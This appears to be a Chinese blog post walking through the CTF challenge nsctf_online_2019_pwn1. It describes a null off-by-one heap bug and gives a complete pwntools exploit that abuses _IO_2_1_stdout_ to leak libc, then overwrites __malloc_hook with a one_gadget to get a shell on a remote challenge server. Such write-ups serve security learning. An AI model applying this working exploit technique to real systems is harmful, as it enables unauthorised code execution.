nsctf_online_2019_pwn1(劫持IO_2_1_stdout来泄露地址)

最新推荐文章于 2023-10-01 19:39:26 发布
最新推荐文章于 2023-10-01 19:39:26 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105855880
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

nsctf_online_2019_pwn1

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

Edit功能里存在一个null off by one漏洞

没有show功能

我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_write_ptr之间的数据,更详细的可以查看我的这篇博客https://blog.csdn.net/seaaseesa/article/details/105590591

#coding:utf8
from pwn import *

#context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
_IO_2_1_stdout_s = libc.symbols['_IO_2_1_stdout_']
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget = 0xf1147

def add(size,content):
   sh.sendlineafter('5.exit','1')
   sh.sendlineafter('Input the size:',str(size))
   sh.sendafter('Input the content:',content)

def delete(index):
   sh.sendlineafter('5.exit','2')
   sh.sendlineafter('Input the index:',str(index))

def edit(index,size,content):
   sh.sendlineafter('5.exit','4')
   sh.sendlineafter('Input the index:',str(index))
   sh.sendlineafter('Input size:',str(size))
   sh.sendafter('Input new content:',content)

def exploit():
   #0
   add(0x80,'a')
   #1
   add(0x68,'b')
   #2
   add(0xF0,'c')
   #3
   add(0x10,'d')

   delete(0)
   #null off by one
   edit(1,0x68,'b'*0x60 + p64(0x70 + 0x90))
   #形成overlap chunk
   delete(2)
   add(0x80,'a') #0
   add(0x68,'b') #2与1重合
   add(0xF0,'c') #4
   delete(0)
   edit(2,0x68,'b'*0x60 + p64(0x70 + 0x90))
   #重新形成overlap chunk
   delete(4)

   #chunk1放fastbin
   delete(1)
   #main_arena指针传递到chunk1的fastbin的fd
   add(0x80,'a') #0
   #0重新放入unsorted bin合并
   delete(0)
   #低字节覆盖fd,使得有一定几率指向_IO_2_1_stdout_附近
   add(0x80+0x10+2,'a'*0x80 + p64(0) + p64(0x71) + p16((2 << 12) + ((_IO_2_1_stdout_s-0x43) & 0xFFF))) #0
   add(0x68,'b') #1
   #申请到stdout上方,篡改stdout达到数据泄露
   payload = '\x00'*0x33 + p64(0x0FBAD1887) +p64(0)*3 + p8(0x88)
   add(0x59,payload) #4
   libc_base = u64(sh.recv(6).ljust(8,'\x00')) - libc.symbols['_IO_2_1_stdin_']
   if libc_base >> 40 != 0x7F:
      raise Exception('error leak!')
   malloc_hook_addr = libc_base + malloc_hook_s
   one_gadget_addr = libc_base + one_gadget
   print 'libc_base=',hex(libc_base)
   print 'malloc_hook_addr=',hex(malloc_hook_addr)
   print 'one_gadget_addr=',hex(one_gadget_addr)
   delete(1)
   edit(2,0x8,p64(malloc_hook_addr - 0x23))
   add(0x68,'b') #1
   #申请到malloc_hook-0x23处
   add(0x60,'\x00'*0x13 + p64(one_gadget_addr)) #5
   #getshell
   sh.sendlineafter('5.exit','1')
   sh.sendlineafter('Input the size:','1')


while True:
   try:
      global sh
      #sh = process('./nsctf_online_2019_pwn1')
      sh = remote('node3.buuoj.cn',26396)
      exploit()
      sh.interactive()
   except:
      sh.close()
      print 'trying...'

 

ha1vk
关注
专栏目录
De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
哒君的博客
08-11 1578
GitHub 例行公事 可以看出保护全开 进行分析 可以发现程序功能很简单 create delete rename create 限定大小最大只能是0x60 index只能是0-9但是是自个输入的 存在一个结构,struct[0] = size,struct[1] = ptr readn函数没有用\x00截断 delete 中间index的判断有问题,且存在uaf ren...
Magic_Book(stdout泄露地址
FUCKING12的博客
11-03 211
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址和堆地址,我们可以利用这2个残余地址来爆破stdout。首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。因为我们没有show函数无法泄露地址,所以我们需要打stdout泄露地址
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1333
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
nssctf [CISCN 2019华北]PWN1
n1ght的博客
03-08 771
通过v1的值覆盖到v2的地址,将小数转成十六机制,发送使v2的值就等于11.2815。还有个思路就是我们覆盖返回地址为system("cat /flag")的地址。我们可以输入v1的值,当v2的值是11.28125的时候,查看文件内容。所以v1离v2的距离是0x30-0x4,并且11.2815的十六进制是。发现func函数,点进去查看函数具体代码。发现开启了栈不可执行和部分地址随机化。checksec查看保护机制。v1离rbp的距离是0x30。看到了逻辑,v2的值0.0。v2离rbp的距离是0x4。
De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1155
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
【八芒星计划】 _IO_2_1_stdout_和_IO_2_1_stdin_ 的任意地址读和任意地址
carol2358的博客
09-04 922
文章目录前言一、GKCTF2020]Domo总结 前言 这篇记一下任意地址读和任意地址写 _IO_2_1_stdout_的任意地址读,_IO_write_base为读取的起始地址,_IO_write_ptr为读取的末地址,并且flag的值要得是0xfbad1800才能正常读取   _IO_2_1_stdin_的任意地址写跟_IO_2_1_stdout_的任意地址读类似,也是需要控制flag还有_IO_buf_base和_IO_buf_end。 这回除了flag、_IO_buf_base和_IO_b
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而实现对负载的精细控制。在本压缩包中,包含的资源是关于单片机实现PWM脉冲发生器的项目,包括Proteus仿真图和C语言源...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
2018南宁ctf RE题目
12-18
2018年4道南宁CTF RE题目,有Windows逆向也有linux逆向
others_pwn1&&starctf_2019_girlfriend
doudoudedi
02-06 645
starctf_2019_girlfriend 正常的uaf漏洞fastbin attack exp: from pwn import * #p=process('./starctf_2019_girlfriend') p=remote('node3.buuoj.cn',27758) elf=ELF('./starctf_2019_girlfriend') libc=elf.libc def ad...
NSCTF web200
weixin_43803070的博客
07-20 546
<?php function encode($str){ $_o=strrev($str); //hjk for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $__=ord($_c)+1; $_c=chr($__); $_=$_.$_c; ...
BUUCTF-PWN刷题记录-17
weixin_44145820的博客
05-06 865
目录nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) 添加没有太大限制,但是会把之前内容清空 删除没有指针悬挂,并且没有show功能 edit有一个off-by-null 利用思路 因为本题的memset清0使得题目变得复杂了一点 进行4次a...
wustctf2020_name_your_cat
最新发布
qq_62887641的博客
10-01 169
32位,开了NX和canary有个后门函数这里有个,如果v0可以控制,我们就相当于任意地址写,v0是下面函数的返回值v0也就是这个函数的v2,没有边界处理,可以任意写。
宁波市第三届网络安全大赛(NSCTF)WP
zhwho的博客
07-12 2465
** 写在开头 从简书回来了,入坑简书半年,由于个人原因,简书账号注销了,以后就在CSDN上写啦 hhhh ** 前段时间和室友一起参加了这次NSCTF,做的题比较杂,WEB、MISC、密码,想着这几天会开环境给复现,现在看好像不给开环境,有的题保存下来了,这里先写写思路,有些截图没保存,以后有机会一定补上。 WEB 签到——本地访问 打开环境,印象里是有一句话: 只有本地管理员才能访问,你想越权访问吗? 这就很明显了,当然想越权访问,不然怎么拿flag?而拿flag的条件很明显有两个——1.本地 2.管理
第六届宁波市赛 [NSCTF2023] 部分web+部分misc+部分密码+mobile
Leaf_initial的博客
05-20 382
只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样。
CTF-【NSCTF 2015】WEB11 条件竞争
关注网络安全、云原生安全
12-21 5015
简介 条件竞争是指多进程/多线程情况下对于共享资源没有加锁,导致的问题。 源代码 <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>NSCTF</title> </head> <body alink="#007000" background="../images/dot.gif" bgcolor="#
linux IO_FILE 利用
热门推荐
sky123博客
03-29 4万+
基本结构 _IO_FILE_plus 定义如下: struct _IO_FILE_plus { FILE file; const struct _IO_jump_t *vtable; }; 包括一个结构体 file 和一个指针 vtable 。 其中 vtable 指向一个函数指针表,很多 IO_FILE 的攻击都是围绕它展开的。 _IO_FILE_plus 类型的结构有 _IO_2_1_stdin_ 、 _IO_2_1_stdout_ 和 _IO_2_1_stderr_ 。另外有头指针 _IO_
六一战队夺魁青少年CTF擂台赛2024_round1:Web与Pwn解题揭秘
比赛涵盖多种技术领域,包括Web应用安全(Web1到Web5)、逆向工程(Reverse1)、密码学(Crypto1到Crypto5)、Pwn(Payload Exploitation, Pwn1Pwn2)以及Miscellaneous(Misc1和Misc4),展示了参赛者在攻防策略...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值